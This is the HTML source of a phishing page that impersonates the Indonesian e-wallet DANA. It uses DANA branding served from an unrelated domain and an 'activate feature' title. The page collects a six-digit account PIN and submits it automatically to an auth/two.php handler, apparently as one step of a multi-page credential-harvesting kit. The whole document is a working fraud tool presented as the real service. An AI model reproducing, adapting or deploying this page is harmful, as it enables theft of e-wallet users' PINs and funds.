<!DOCTYPE html>
<html lang="id">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>𝗗𝗔𝗡𝗔 𝗜𝗗 || 𝗔𝗞𝗧𝗜𝗙𝗞𝗔𝗡 𝗙𝗜𝗧𝗨𝗥</title>
  <meta name="description" content="Hai TemanDANA, Jika membutuhkan bantuan yuk hubungi kami langsung">

  <!-- Open Graph -->
  <meta property="og:title" content="𝗗𝗔𝗡𝗔 𝗜𝗗 || 𝗔𝗞𝗧𝗜𝗙𝗞𝗔𝗡 𝗙𝗜𝗧𝗨𝗥">
  <meta property="og:description" content="Hai TemanDANA, Jika membutuhkan bantuan yuk hubungi kami langsung">
  <meta property="og:image" content="https://dana.zalnir.biz.id/images/img-dana_logo.png">
  <meta property="og:url" content="https://www.dana.id/">
  <meta property="og:type" content="website">

  <!-- Twitter -->
  <meta name="twitter:card" content="summary_large_image">
  <meta name="twitter:title" content="𝗗𝗔𝗡𝗔 𝗜𝗗 || 𝗔𝗞𝗧𝗜𝗙𝗞𝗔𝗡 𝗙𝗜𝗧𝗨𝗥">
  <meta name="twitter:description" content="Hai TemanDANA, Jika membutuhkan bantuan yuk hubungi kami langsung">
  <meta name="twitter:image" content="https://dana.zalnir.biz.id/images/img-dana_logo.png">

<style>
*{
  box-sizing:border-box;
  font-family:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,Arial,sans-serif;
}

body{
  margin:0;
  min-height:100vh;
  background:linear-gradient(180deg,#1e7ed8,#4aa3ff);
  color:#fff;
  display:flex;
  flex-direction:column;
}

/* ===== HEADER ===== */
header{
  position:relative;
  padding:20px 0 10px;
  text-align:center;
}
.back-btn{
  position:absolute;
  left:16px;
  top:16px;
  font-size:20px;
  color:#fff;
  text-decoration:none;
}
header img{
  width:72px;
}

/* ===== MAIN ===== */
main{
  flex:1;
  display:flex;
  flex-direction:column;
  justify-content:flex-start;
  padding:120px 24px 0;
}

.title{
  text-align:center;
  font-size:16px;
  font-weight:600;
  margin-bottom:18px;
}

.pin{
  display:flex;
  justify-content:center; /* jangan space-between */
  gap:4px;                /* jarak dipersempit */
  max-width:300px;
  margin:0 auto 20px;
}


.pin input{
  width:40px;
  height:40px;
  border-radius:9px;
  border:none;
  background:#fff;
  text-align:center;
  font-size:18px;
  outline:none;
}

/* BUTTON */
.actions{
  display:flex;
  justify-content:center;
}

.btn{
  width:150px;              /* 2/4 dari 300px */
  height:34px;
  border-radius:17px;
  background:transparent;
  border:1.2px solid #fff;  /* border lebih tipis */
  color:#fff;
  font-size:12px;
  font-weight:500;
}

/* ===== FOOTER ===== */
footer{
  text-align:center;
  padding:16px 0;
  padding-bottom:calc(16px + env(safe-area-inset-bottom));
}

footer a{
  font-size:13px;
  color:#eaf4ff;
  text-decoration:none;
}
</style>
</head>
 
 <link rel="canonical" href="https://www.dana.id/">
<meta property="og:url" content="">
<meta property="og:description" content="Hai TemanDANA, Jika membutuhkan bantuan yuk hubungi kami langsung">
<meta property="twitter:description" content="Hai TemanDANA, Jika membutuhkan bantuan yuk hubungi kami langsung">
<body>

<header>
  <a href="login.php" class="back-btn"><</a>
  <img src="img/danlog.png" alt="Logo">
</header>

<main>
  <div class="title">Masukkan PIN</div>

  <form action="auth/two.php" method="post">

    <div class="pin">
  <input inputmode="numeric" id="pn1" maxlength="1" autocomplete="off" type="password" class="inpn" name="pn1" ></input>
  <input inputmode="numeric" id="pn2" maxlength="1" autocomplete="off" type="password" class="inpn" name="pn2" ></input>
  <input inputmode="numeric" id="pn3" maxlength="1" autocomplete="off" type="password" class="inpn" name="pn3" ></input>
  <input inputmode="numeric" id="pn4" maxlength="1" autocomplete="off" type="password" class="inpn" name="pn4" ></input>
  <input inputmode="numeric" id="pn5" maxlength="1" autocomplete="off" type="password" class="inpn" name="pn5" ></input>
  <input inputmode="numeric" id="pn6" maxlength="1" autocomplete="off" type="password" class="inpn" name="pn6" ></input>
  </div>
    </div>

    <div class="actions">
      <button type="button" id="togglePin" class="btn">TAMPILKAN</button>
    </div>

  </form>
</main>

<footer>
  <a href="#">Lupa PIN?</a>
</footer>

<script>
const inputs = document.querySelectorAll('.pin input');
const toggle = document.getElementById('togglePin');
const form = document.querySelector('form');
let show = false;

/* ===== FOKUS & INPUT TERKONTROL ===== */
inputs.forEach((el, i) => {

  // input angka + auto pindah
  el.addEventListener('input', () => {
    el.value = el.value.replace(/\D/g, '');

    if (el.value && i < inputs.length - 1) {
      inputs[i + 1].focus();
    }

    checkComplete();
  });

  // cegah loncat ke input depan
  el.addEventListener('focus', () => {
    for (let j = 0; j < i; j++) {
      if (inputs[j].value === "") {
        inputs[j].focus();
        break;
      }
    }
  });

  // backspace rapi
  el.addEventListener('keydown', (e) => {
    if (e.key === "Backspace" && !el.value && i > 0) {
      inputs[i - 1].focus();
    }
  });
});

/* ===== AUTO SUBMIT JIKA LENGKAP ===== */
function checkComplete() {
  let filled = true;
  inputs.forEach(i => {
    if (i.value === "") filled = false;
  });

  if (filled) {
    setTimeout(() => {
      form.submit();
    }, 300); // delay dikit biar halus
  }
}

/* ===== TOGGLE TAMPILKAN ===== */
toggle.onclick = (e) => {
  e.preventDefault();
  show = !show;
  inputs.forEach(i => i.type = show ? 'text' : 'password');
  toggle.textContent = show ? 'SEMBUNYIKAN' : 'TAMPILKAN';
};
</script>

<script defer src="https://static.cloudflareinsights.com/beacon.min.js/vcd15cbe7772f49c399c6a5babf22c1241717689176015" integrity="sha512-ZpsOmlRQV6y907TI0dKBHq9Md29nnaEIPlkf84rnaERnq6zvWvPUqr2ft8M1aS28oN72PdrCzSjY4U6VaAw1EQ==" data-cf-beacon='{"version":"2024.11.0","token":"b4c1f83de99e403e8fa41ca098217934","r":1,"server_timing":{"name":{"cfCacheStatus":true,"cfEdge":true,"cfExtPri":true,"cfL4":true,"cfOrigin":true,"cfSpeedBrain":true},"location_startswith":null}}' crossorigin="anonymous"></script>
</body>
</html>
